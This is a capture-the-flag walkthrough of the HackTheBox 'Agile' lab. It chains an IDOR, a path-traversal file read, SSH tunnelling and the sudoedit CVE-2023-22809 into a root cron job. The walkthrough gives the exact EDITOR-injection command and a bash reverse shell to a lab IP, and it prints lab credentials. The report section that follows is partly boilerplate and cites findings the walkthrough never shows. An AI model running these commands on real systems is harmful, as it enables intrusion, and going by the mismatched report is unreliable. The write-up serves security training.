walkthrough

HackTheBox: Agile — Medium (Linux)

Full security assessment walkthrough for Agile on HackTheBox. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 1 views
Agile
HackTheBox
Linux Medium

📌 Introduction

Agile

Untitled
Untitled

🔖 Techniques & Vulnerabilities

rcelfisudocronjobidor

🎯 Attack Surface Analysis

PortServiceVersion / Banner
22/tcpsshsyn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcphttpsyn-ack nginx 1.18.0 (Ubuntu)
22/tcpSSH
  • Credential brute-force and password spraying
  • Username enumeration via timing side-channel in older OpenSSH versions
  • Weak or reused private key material granting unauthorised access
  • Version-specific CVE research based on banner fingerprint
  • Lateral movement using credentials discovered from other services
80/tcpHTTP
  • Content and directory discovery — hidden files, backup archives, development endpoints
  • CMS/framework fingerprinting enables targeted CVE research (WordPress, Joomla, Drupal)
  • SQL injection — database extraction, authentication bypass, or OS command execution
  • Command injection — OS execution via unsanitised parameter handling
  • Server-Side Template Injection (SSTI) — code execution through template engine abuse
  • Local File Inclusion (LFI) and path traversal — sensitive file disclosure
  • Server-Side Request Forgery (SSRF) — pivot to internal services and cloud metadata
  • File upload abuse — filter bypass for webshell placement
  • XML External Entity injection (XXE) in XML-consuming endpoints
  • Authentication and session weaknesses — weak passwords, predictable tokens

📖 Walkthrough

nmap

    22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 f4:bc:ee:21:d7:1f:1a:a2:65:72:21:2d:5b:a6:f7:00 (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=
    |   256 65:c1:48:0d:88:cb:b9:75:a0:2c:a5:e6:37:7e:51:06 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK
    80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
    |_http-title: Did not follow redirect to http://superpass.htb
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    ```

## IDOR
When we edit our password entries, we can change the id in the URL

- /vault/edit_row/3

url - hackthebox.com username - 0xdf password - 762b430d32eea2f12970


- /vault/edit_row/4

url - mgoblog.com username - 0xdf password - 5b133f7a6a1c180646cb


- /vault/edit_row/6

url - mgoblog username - corum password - 47ed1e73c955de230a1d


- /vault/edit_row/7

url - ticketmaster username - corum password - 9799588839ed0f98c211


- /vault/edit_row/8

url - agile username - corum password - 5db7caa1d13cc37c9fc2


We find with dirsearch the path `/download`

## LFI
We can use the `fn` `URL-Parameter` to read files from `/tmp`

- [http://superpass.htb/download?fn=../etc/passwd](http://superpass.htb/download?fn=../etc/passwd)

We know there is the user corum in /etc/passwd

We can login over ssh with the password

`corum : 5db7caa1d13cc37c9fc2`

→ user.txt

# Lateral Movement: from edwards

- `netstat -tulpn`

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:41829 0.0.0.0: LISTEN - tcp 0 0 127.0.0.1:5000 0.0.0.0: LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0: LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0: LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0: LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0: LISTEN - tcp 0 0 127.0.0.1:5555 0.0.0.0: LISTEN - tcp 0 0 127.0.0.1:58409 0.0.0.0: LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0: LISTEN - tcp6 0 0 ::1:58409 ::: LISTEN - tcp6 0 0 :::22 ::: LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0: - udp 0 0 0.0.0.0:68 0.0.0.0:* -


We see the port `5555` is the password vault website, but this is only at the localhost.

## SSH Tunneling
- `ssh -L 5555:127.0.0.1:5555 [email protected]`

Create a new account and use the IDOR again

### IDOR

- `/vault/edit_row/1`

url - agile username - edwards password - d07867c6267dcb5df0af


We can now login to the user

`edwards : d07867c6267dcb5df0af`

# Lateral Movement: from dev_admin

- `sudo -l`

User edwards may run the following commands on agile: (devadmin : devadmin) sudoedit /app/configtest.json (devadmin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt


### sudoedit — [`CVE-2023-22809`](https://nvd.nist.gov/vuln/detail/CVE-2023-22809)

> In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.
> 
- `sudo -V`

Sudo version 1.9.9 Sudoers policy plugin version 1.9.9 Sudoers file grammar version 48 Sudoers I/O plugin version 1.9.9 Sudoers audit plugin version 1.9.9


We can use this exploit to read any file from user `dev_admin`

https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc

[Part 14 - CVE-2023-22809](https://www.youtube.com/watch?v=EYGdHwkaqmA&ab_channel=BlueAce)

- `find / -type f -group dev_admin 2>/dev/null`

/app/venv/bin/activate /app/venv/bin/Activate.ps1 /app/venv/bin/activate.fish /app/venv/bin/activate.csh


### PsPy

We see root runs this file in a cronjob !

2023/03/08 19:52:01 CMD: UID=0 PID=2380 | /bin/bash -c source /app/venv/bin/activate


Write a rev shell to this file. 

- `EDITOR='vi -- /app/venv/bin/activate' sudo -u dev_admin sudoedit /app/config_test.json`

```bash
bash -c 'bash -i >& /dev/tcp/10.10.14.18/4444 0>&1'

Save with :wq!

After some time…

→ root.txt

📋 Security Assessment Report

1
Critical
4
High
0
Medium
2
Open Ports
F-001 — OS Command Injection — Remote Code Execution
9.8
Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the application was found to pass user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.

Impact

An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Never construct shell commands from user-supplied input under any circumstances. Replace shell invocations with language-native APIs that accept argument arrays (subprocess.run with list in Python, proc_open with array in PHP, execFile in Node.js). Apply strict allowlist validation to any parameter that influences system-level operations. Run the application under a dedicated low-privilege service account. Implement process monitoring to alert on anomalous child process spawning from web server processes.
F-002 — Insecure Direct Object Reference — Unauthorised Data Access
8.1
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Description

During the penetration test, it was discovered that the application exposed direct references to internal objects — user IDs, document identifiers, and resource paths — in URL parameters and request bodies without verifying that the authenticated user has authorisation to access the referenced object. By modifying these identifiers, it was possible to access data belonging to other users.

Impact

An attacker with any authenticated account can access, modify, or delete data belonging to any other user in the application by enumerating or guessing object identifiers. In this engagement, IDOR exposure encompassed all registered user profiles, associated sensitive records, and configuration data. Where write operations were also exposed without authorisation checks, data integrity across the entire user base was at risk.

Confidentiality
High
Integrity
High
Availability
None

Remediation

Implement server-side object-level authorisation checks on every request that accesses a resource — verify that the authenticated user owns or has explicit permission to access the referenced object, regardless of how the identifier was supplied. Replace sequential integer IDs in all external-facing references with randomly generated UUIDs or cryptographically opaque tokens. Conduct a comprehensive audit of all API endpoints for missing authorisation checks using an automated tool and manual review.
F-003 — Sudo Misconfiguration — Root Privilege Escalation
7.8
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration was found to grant the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.
F-004 — Cron Job Misconfiguration — Scheduled Root Execution
7.8
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that a root-owned cron job was identified that executes a script or binary that is writable by a lower-privileged user. By modifying the script content before the next scheduled execution cycle, arbitrary commands can be injected and will run as root automatically — without requiring any elevated access at the time of the modification.

Impact

An attacker with write access to the cron-referenced script achieves root code execution on the next cron cycle without any administrator interaction. Depending on cron frequency, the exploitation window ranges from seconds to minutes. During this engagement, the writable cron script was modified to execute a reverse shell, resulting in a root-level shell and complete host compromise on the next scheduled run.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Audit all cron jobs in /etc/crontab, /etc/cron.d/, and all user crontabs for scripts executed with elevated privileges. Ensure every script executed by root-owned cron jobs is owned by root and is not world-writable or group-writable by untrusted groups. Remove any cron references to non-existent scripts immediately — attackers can create the missing file at the expected path. Implement file integrity monitoring on all cron-executed scripts.
F-005 — Local File Inclusion — Sensitive File Disclosure
7.5
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Description

During the penetration test, it was discovered that the application constructed file system paths using user-supplied parameters without adequate sanitisation or path canonicalisation. By injecting path traversal sequences into the vulnerable parameter, it was possible to traverse outside the intended directory and read arbitrary files from the server file system.

Impact

An attacker can read arbitrary files accessible to the web application process — including database credentials, application API keys, SSH private keys from user home directories, and system files such as /etc/passwd and /etc/shadow. Credentials discovered through file inclusion were used during this engagement to gain authenticated access to additional services. In PHP applications, log poisoning chains this vulnerability to full remote code execution.

Confidentiality
High
Integrity
None
Availability
None

Remediation

Validate all file path inputs by canonicalising the resolved path and verifying it begins within the expected base directory before any file operation. Implement a strict allowlist of permitted filenames where dynamic file access is required. Apply PHP open_basedir restrictions to prevent file access outside the application directory. Remove file inclusion functionality that relies on user-supplied paths and replace with explicit, hardcoded include statements.
Reactions

Related Articles